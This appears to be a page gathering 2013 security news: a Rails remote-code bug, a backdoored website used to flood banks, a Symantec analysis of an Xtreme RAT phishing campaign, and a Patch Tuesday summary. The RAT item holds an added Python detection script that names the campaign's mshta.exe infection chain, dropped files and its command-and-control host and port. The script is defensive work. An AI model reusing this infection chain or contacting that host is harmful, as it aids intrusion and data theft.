Extremely critical Ruby on Rails bug threatens more than 200,000 sites

Hundreds of thousands of websites are potentially at risk following the discovery of an extremely critical vulnerability in the Ruby on Rails framework that gives remote attackers the ability to execute malicious code on the underlying servers.

The bug is present in Rails versions spanning the past six years and in default configurations gives hackers a simple and reliable way to pilfer database contents, run system commands, and cause websites to crash, according to Ben Murphy, one of the developers who has confirmed the vulnerability. As of last week, the framework was used by more than 240,000 websites, including Github, Hulu, and Basecamp, underscoring the seriousness of the threat.

"It is quite bad," Murphy told Ars. "An attack can send a request to any Ruby on Rails server and then execute arbitrary commands. Even though it's complex, it's reliable, so it will work 100 percent of the time."


Secret footsoldier targeting banks reveals meaner, leaner face of DDoS

Screenshots showing the denial-of-service PHP script before and after it has been decoded.

Over the past two weeks, a new wave of Web attacks has battered major US banks, causing disruptions for many of their online services. Now, an Israel-based security firm has uncovered one of the secret footsoldiers behind the mass assault: a compromised website that was rigged to unleash a torrent of junk traffic on three of the world's biggest financial institutions.

The discovery by Web application security firm Incapsula helps explain the strategy behind the four-month-old campaign, which has been carried out under the flag of a group calling itself Izz ad-Din al-Qassam—rather than compromise and recruit thousands or tens of thousands of end-user PCs to carry out the distributed denial-of-service attacks, why not target a handful of Web servers that have orders of magnitude more bandwidth and processing power?

Over the weekend, Incapsula researchers noticed a general-interest website located in the UK that was exhibiting suspicious behavior. They quickly discovered a backdoor that had been planted on it that was programmed to receive instructions from remote attackers. An analysis showed the website, which had just recently contracted with Incapsula, was being directed to send a flood of HTTP and UDP packets to major banks including PNC Financial Services, HSBC, and Fifth Third Bank.


W32.Extrat: Syrian Conflict Used To Deliver Xtreme RAT

Contributor: Jeet Morparia

As conflict in Syria continues, email attacks against various organizations throughout the Middle East and Europe have also been identified.

Figure 1. Sample email used in this campaign from "Free Dom" (Freedom)

The targeted organizations are extensive, from individuals at a public university, to hotels, oil companies, and government agencies.

Recipients of these emails are presented with text in Arabic. The email (Figure 1) claims to be an important message from Sheikh Adnan al-Aroor, a figure in opposition to the current Syrian government. The email includes a .zip file attachment, which contains a .lnk (shortcut) file.

In the past, we have blogged about .lnk files being used in other attacks. This particular attack relies on social engineering.

Figure 2. Properties of .lnk file used in this campaign

The .lnk file (detected as Downloader) contains a reference to MSHTA.exe, the Microsoft HTML Application Host file. The target of the .lnk file is passed an argument that points to an HTML file hosted on a malicious website.

The HTML file contains a combination of Visual Basic scripting and an embedded executable. The script is responsible for dropping the 1.exe file onto the compromised computer and executing it. This file is an executable compiled from an AutoIt script.

Once this file is executed, it copies itself to a temporary folder on the computer as svhost.exe. It also creates the following files in a specified temporary folder:

  • Microsoft.vbs
  • once.txt
  • start.cmd
  • svhost.exe

Figure 3. Document file used as smoke screen

The threat then creates registry entries so that it executes every time Windows starts. It also drops an araor.doc file (Figure 3) in the %Temp% folder and opens it. This file contains text that ties into the original lure: a message from Sheikh Adnan al-Aroor. This is a smoke screen to give the campaign an air of legitimacy. In actuality, the user is now infected with Xtreme RAT, which Symantec detects as W32.Extrat.

Xtreme RAT is a Remote Administration Tool (RAT) that allows a remote user to monitor keystrokes and steal information from the compromised computer. In this particular sample, we observed outbound connectivity to tn5.linkpc.net on port 82.
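The infection chain described above (mshta.exe launched with a remote URL, files dropped into the temporary folder, a startup entry, and the outbound connection to tn5.linkpc.net on port 82) gives a defender several observable points. The following Python script is an added example, not Symantec's code or part of the original write-up: it matches those indicators against a few constructed host and network log lines. The log record shapes (PROC, FILE, REG, NET), the sample paths, the URL example.invalid and the use of the HKCU Run key for the startup entry are all assumptions made for the example; the write-up only says registry entries are created so the threat runs at startup, without naming the key.

```python
"""
Added example (not part of the Symantec write-up): match the host and network
indicators named in the post against constructed log lines.
"""
import re
from dataclasses import dataclass
from typing import List

# Indicators taken from the write-up: C2 endpoint and dropped file names.
C2_HOST = "tn5.linkpc.net"
C2_PORT = 82
DROPPED_FILES = {"1.exe", "microsoft.vbs", "once.txt", "start.cmd", "svhost.exe", "araor.doc"}


@dataclass
class Finding:
    line_no: int
    rule: str
    detail: str


# Constructed sample telemetry (not real logs). Record shapes are an assumption:
#   PROC <parent_image> -> <image> <command line>
#   FILE <image> wrote <path>
#   REG  <image> set <key\value> = <data>
#   NET  <image> <dst_host>:<dst_port>
SAMPLE_LOG = """\
PROC explorer.exe -> mshta.exe "C:\\Windows\\System32\\mshta.exe" http://example.invalid/lure/index.html
FILE mshta.exe wrote C:\\Users\\u\\AppData\\Local\\Temp\\1.exe
PROC mshta.exe -> 1.exe C:\\Users\\u\\AppData\\Local\\Temp\\1.exe
FILE 1.exe wrote C:\\Users\\u\\AppData\\Local\\Temp\\svhost.exe
FILE 1.exe wrote C:\\Users\\u\\AppData\\Local\\Temp\\start.cmd
FILE 1.exe wrote C:\\Users\\u\\AppData\\Local\\Temp\\araor.doc
REG 1.exe set HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svhost = C:\\Users\\u\\AppData\\Local\\Temp\\svhost.exe
NET svhost.exe tn5.linkpc.net:82
PROC explorer.exe -> winword.exe "C:\\Program Files\\Microsoft Office\\winword.exe" C:\\Users\\u\\Documents\\notes.docx
NET chrome.exe www.example.org:443
"""

PROC_RE = re.compile(r"^PROC\s+(\S+)\s+->\s+(\S+)\s+(.*)$")
FILE_RE = re.compile(r"^FILE\s+(\S+)\s+wrote\s+(.*)$")
REG_RE = re.compile(r"^REG\s+(\S+)\s+set\s+(\S+)\s+=\s+(.*)$")
NET_RE = re.compile(r"^NET\s+(\S+)\s+(\S+):(\d+)$")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _in_temp(path: str) -> bool:
    return "\\temp\\" in path.lower()


def scan(log_text: str) -> List[Finding]:
    """Return one Finding per log line that matches an indicator from the write-up."""
    findings: List[Finding] = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = PROC_RE.match(line)
        if m:
            _parent, image, cmdline = m.groups()
            # The .lnk hands mshta.exe a URL pointing at the hosted HTML file.
            if image.lower() == "mshta.exe" and re.search(r"https?://", cmdline, re.I):
                findings.append(Finding(n, "mshta-remote-hta", cmdline))
            continue
        m = FILE_RE.match(line)
        if m:
            _image, path = m.groups()
            # Dropped artefacts land in the temporary folder under fixed names.
            if _basename(path) in DROPPED_FILES and _in_temp(path):
                findings.append(Finding(n, "temp-drop", path))
            continue
        m = REG_RE.match(line)
        if m:
            _image, key, data = m.groups()
            # Startup entry whose target lives in a temporary folder (key name is an assumption).
            if "\\currentversion\\run\\" in key.lower() and _in_temp(data):
                findings.append(Finding(n, "run-key-temp", f"{key} = {data}"))
            continue
        m = NET_RE.match(line)
        if m:
            image, host, port = m.groups()
            if host.lower() == C2_HOST and int(port) == C2_PORT:
                findings.append(Finding(n, "c2-connection", f"{image} -> {host}:{port}"))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.rule}: {f.detail}")
```

On the constructed sample the script flags seven lines: the mshta.exe launch, the four writes into Temp, the Run entry pointing into Temp, and the connection to the C2 host; the Word and browser lines pass. The hostname and port rule is the most brittle (the operator can change either), so the mshta-with-URL and Temp-resident startup patterns are the ones worth keeping after this particular campaign is over.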

Figure 4. Another smoke screen from a similar campaign

Presently there are other campaigns attempting to spread W32.Extrat, including one that was virtually the same—just using a different lure. In the preceding Figure 4, you can see the smoke screen document used in that particular campaign.

This is not the first time that we have seen malware used during a time of conflict in the Middle East and it will not likely be the last.

Microsoft Patch Tuesday – January 2013

Hello, welcome to this month's blog on the Microsoft patch release. This month the vendor is releasing seven bulletins covering a total of 12 vulnerabilities. Three of this month's issues are rated 'Critical'.

As always, customers are advised to follow these security best practices:

  • Install vendor patches as soon as they are available.
  • Run all software with the least privileges required while still maintaining functionality.
  • Avoid handling files from unknown or questionable sources.
  • Never visit sites of unknown or questionable integrity.
  • Block external access at the network perimeter to all key systems unless specific access is required.

Microsoft's summary of the January releases can be found here:
http://technet.microsoft.com/en-us/security/bulletin/ms13-Jan

The following is a breakdown of the issues being addressed this month:

  1. MS13-001 Vulnerability in Windows Print Spooler Components Could Allow Remote Code Execution

    Windows Print Spooler Components Vulnerability (CVE-2013-0011) MS Rating: Critical

    A remote code execution vulnerability exists in the way that Microsoft Windows handles a malformed print spooler response to a client request. The vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code.

  2. MS13-002 Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution

    MSXML Integer Truncation Vulnerability (CVE-2013-0006) MS Rating: Critical

    A remote code execution vulnerability exists in the way that Microsoft Windows parses XML content. The vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.

    MSXML XSLT Vulnerability (CVE-2013-0007) MS Rating: Critical

    A remote code execution vulnerability exists in the way that Microsoft Windows parses XML content. The vulnerability may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.

  3. MS13-003 Vulnerabilities in System Center Operations Manager Could Allow Elevation of Privilege

    System Center Operations Manager Web Console XSS Vulnerability (CVE-2013-0009) MS Rating: Important

    A cross-site scripting (XSS) vulnerability exists in the System Center Operations Manager that could allow specially crafted script code to run under the guise of the server. This is a non-persistent cross-site scripting vulnerability that could allow an attacker to issue commands to the System Center Operations Manager server in the context of the targeted user.

    System Center Operations Manager Web Console XSS Vulnerability (CVE-2013-0010) MS Rating: Important

    A cross-site scripting (XSS) vulnerability exists in the System Center Operations Manager that could allow specially crafted script code to run under the guise of the server. This is a non-persistent cross-site scripting vulnerability that could allow an attacker to issue commands to the System Center Operations Manager server in the context of the targeted user.

  4. MS13-004 Vulnerability in .NET Framework Could Allow Elevation of Privilege

    System Drawing Information Disclosure Vulnerability (CVE-2013-0001) MS Rating: Moderate

    An information disclosure vulnerability exists in the way that the Windows Forms in the .NET Framework handles pointers to unmanaged memory locations.

    WinForms Buffer Overflow Vulnerability (CVE-2013-0002) MS Rating: Important

    An elevation of privilege vulnerability exists in the way that the Windows Forms in the .NET Framework validates the number of objects in memory before copying those objects into an array.

    S.DS.P Buffer Overflow Vulnerability (CVE-2013-0003) MS Rating: Important

    An elevation of privilege vulnerability exists in the way that the System.DirectoryServices.Protocols (S.DS.P) in the .NET Framework validates the size of objects in memory prior to copying those objects into an array.

    Double Construction Vulnerability (CVE-2013-0004) MS Rating: Important

    An elevation of privilege vulnerability exists in the way that the .NET Framework validates the permissions of certain objects in memory. An attacker who successfully exploited this vulnerability could take complete control of an affected system.

  5. MS13-005 Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege

    Win32k Improper Message Handling Vulnerability (CVE-2013-0008) MS Rating: Important

    An elevation of privilege vulnerability exists when the Windows kernel improperly handles window broadcast messages.

  6. MS13-006 Vulnerability in Microsoft Windows Could Allow Security Feature Bypass

    Microsoft SSL Version 3 and TLS Protocol Security Feature Bypass Vulnerability (CVE-2013-0013) MS Rating: Important

    A security feature bypass vulnerability exists in the way that the Microsoft Windows SSL/TLS (Secure Sockets Layer and Transport Layer Security) implementation handles the SSL version 3 (SSLv3) and TLS protocols. The vulnerability could allow a security feature bypass if an attacker injects specially crafted content into an SSL/TLS session.

  7. MS13-007 Vulnerability in Open Data Protocol Could Allow Denial of Service

    Replace Denial of Service Vulnerability (CVE-2013-0005) MS Rating: Important

    A denial of service vulnerability exists in the OData specification. The vulnerability could cause the server or service to stop responding and restart.

More information on the vulnerabilities being addressed this month is available at Symantec's free SecurityFocus portal and to our customers through the DeepSight Threat Management System.